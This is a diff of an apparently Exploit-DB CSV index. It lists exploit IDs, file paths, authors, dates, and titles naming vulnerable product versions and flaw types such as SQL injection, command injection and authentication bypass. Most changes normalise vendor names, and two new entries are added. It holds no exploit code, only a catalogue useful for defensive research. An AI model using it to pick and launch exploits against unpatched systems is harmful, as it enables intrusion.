38103,exploits/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' SQL Injection",2012-12-04,AkaStep,webapps,php, -38097,exploits/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80 +38097,exploits/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80 38098,exploits/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,webapps,jsp,8081 38105,exploits/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,webapps,php,80 38110,exploits/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",webapps,php, @@ -38327,7 +38328,7 @@ id,file,description,date,author,type,platform,port 38445,exploits/php/webapps/38445.txt,"Joomla! Component com_realestatemanager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",webapps,php, 38446,exploits/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,webapps,php, 38448,exploits/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",webapps,hardware, -38449,exploits/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware, +38449,exploits/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",webapps,hardware, 38450,exploits/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",webapps,php, 38455,exploits/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",webapps,hardware, 38476,exploits/php/webapps/38476.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-14,"Chiekh Bouchenafa",webapps,php, @@ -38797,7 +38798,7 @@ id,file,description,date,author,type,platform,port 39352,exploits/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,webapps,php, 39354,exploits/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,webapps,php,80 39355,exploits/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,webapps,php,80 -39356,exploits/hardware/webapps/39356.py,"NETGEAR WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80 +39356,exploits/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",webapps,hardware,80 39382,exploits/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,webapps,multiple, 39384,exploits/php/webapps/39384.txt,"WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,webapps,php, 39385,exploits/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",webapps,php,80 @@ -38813,7 +38814,7 @@ id,file,description,date,author,type,platform,port 39409,exploits/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware, 39410,exploits/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",webapps,php,80 39411,exploits/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",webapps,php,80 -39412,exploits/hardware/webapps/39412.txt,"NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware, +39412,exploits/hardware/webapps/39412.txt,"Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",webapps,hardware, 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80 39414,exploits/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",webapps,php,80 39415,exploits/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",webapps,php,80 @@ -39402,8 +39403,8 @@ id,file,description,date,author,type,platform,port 40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",webapps,hardware, 40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php, 40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware, -40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi, -40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware, +40889,exploits/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi, +40898,exploits/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware, 40901,exploits/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",webapps,hardware, 40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php, 40908,exploits/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,webapps,php,80 @@ -39578,7 +39579,7 @@ id,file,description,date,author,type,platform,port 41198,exploits/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php, 41199,exploits/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, 41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php, -41205,exploits/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware, +41205,exploits/hardware/webapps/41205.py,"Netgear Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware, 41201,exploits/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, 41202,exploits/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, 41203,exploits/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, @@ -39714,7 +39715,7 @@ id,file,description,date,author,type,platform,port 41391,exploits/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, 41392,exploits/php/webapps/41392.html,"RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery",2016-08-30,"Arbin Godar",webapps,php, 41393,exploits/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",webapps,php, -41394,exploits/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware, +41394,exploits/hardware/webapps/41394.py,"Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,webapps,hardware, 41395,exploits/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,webapps,windows, 41396,exploits/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,webapps,php, 41399,exploits/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",webapps,php, @@ -39760,7 +39761,7 @@ id,file,description,date,author,type,platform,port 41453,exploits/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,multiple, 41455,exploits/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,webapps,php, 41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, -41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware, +41459,exploits/hardware/webapps/41459.py,"Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware, 41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, 41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple, 41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, @@ -39769,7 +39770,7 @@ id,file,description,date,author,type,platform,port 41465,exploits/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php, 41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java, 41470,exploits/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",webapps,php, -41472,exploits/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware, +41472,exploits/hardware/webapps/41472.html,"Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,webapps,hardware, 41478,exploits/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",webapps,hardware, 41492,exploits/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' SQL Injection",2017-03-02,"Ihsan Sencan",webapps,php, 41482,exploits/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",webapps,xml, @@ -39822,7 +39823,7 @@ id,file,description,date,author,type,platform,port 41535,exploits/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, 41536,exploits/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, 41539,exploits/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php, -41540,exploits/php/webapps/41540.py,"Multiple WordPress Plugins - Arbitrary File Upload",2017-03-03,"The Martian",webapps,php, +41540,exploits/php/webapps/41540.py,"Multiple WordPress Plugins - Arbitrary File Upload",2017-03-03,"The Martian",webapps,php, 41541,exploits/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",webapps,json, 41543,exploits/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php, 41544,exploits/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",webapps,php, @@ -40583,7 +40584,7 @@ id,file,description,date,author,type,platform,port 42950,exploits/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",webapps,php, 42953,exploits/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)",2017-09-20,xxlegend,webapps,windows, 42954,exploits/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",webapps,php, -42956,exploits/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware, +42956,exploits/hardware/webapps/42956.txt,"Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",webapps,hardware, 42959,exploits/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",webapps,php, 42961,exploits/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby, 42966,exploits/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)",2017-10-09,intx0x80,webapps,jsp, @@ -41523,7 +41524,7 @@ id,file,description,date,author,type,platform,port 45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80 45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80 45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80 -45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80 +45741,exploits/hardware/webapps/45741.txt,"Netgear WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80 45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80 45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80 @@ -42116,7 +42117,7 @@ id,file,description,date,author,type,platform,port 47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java, 47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java, 47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi, -47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware, +47117,exploits/hardware/webapps/47117.txt,"Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware, 47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware, 47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80 47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux, @@ -42520,7 +42521,7 @@ id,file,description,date,author,type,platform,port 48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml, 48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple, 48029,exploits/multiple/webapps/48029.txt,"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting",2020-02-10,"Prasenjit Kanti Paul",webapps,multiple, -48030,exploits/php/webapps/48030.txt,"WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php, +48030,exploits/php/webapps/48030.txt,"WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php, 48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi, 48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php, 48047,exploits/php/webapps/48047.rb,"WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80 @@ -42704,7 +42705,7 @@ id,file,description,date,author,type,platform,port 48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php, 48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php, 48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware, -48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php, +48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php, 48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php, 48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php, 48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php, @@ -42720,7 +42721,7 @@ id,file,description,date,author,type,platform,port 48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple, 48454,exploits/linux/webapps/48454.py,"Phase Botnet - Blind SQL Injection",2014-12-23,MalwareTech,webapps,linux, 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx, -48457,exploits/php/webapps/48457.txt,"ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php, +48457,exploits/php/webapps/48457.txt,"WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection",2020-05-12,SunCSR,webapps,php, 48458,exploits/php/webapps/48458.txt,"CuteNews 2.1.2 - Authenticated Arbitrary File Upload",2020-05-12,"Nhat Ha",webapps,php, 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java, 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php, @@ -42733,7 +42734,7 @@ id,file,description,date,author,type,platform,port 48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php, 48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java, 48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware, -48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php, +48475,exploits/php/webapps/48475.txt,"WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php, 48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php, 48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java, 48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php, @@ -42755,7 +42756,7 @@ id,file,description,date,author,type,platform,port 48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple, 48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php, 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php, -48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, +48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php, 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php, 48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php, @@ -42775,7 +42776,7 @@ id,file,description,date,author,type,platform,port 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, 48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php, 48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple, -48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php, +48534,exploits/php/webapps/48534.py,"WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php, 48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple, 48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php, 48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php, @@ -42803,8 +42804,10 @@ id,file,description,date,author,type,platform,port 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php, -48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, +48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php, 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple, 48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple, 48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple, +48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware, +48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,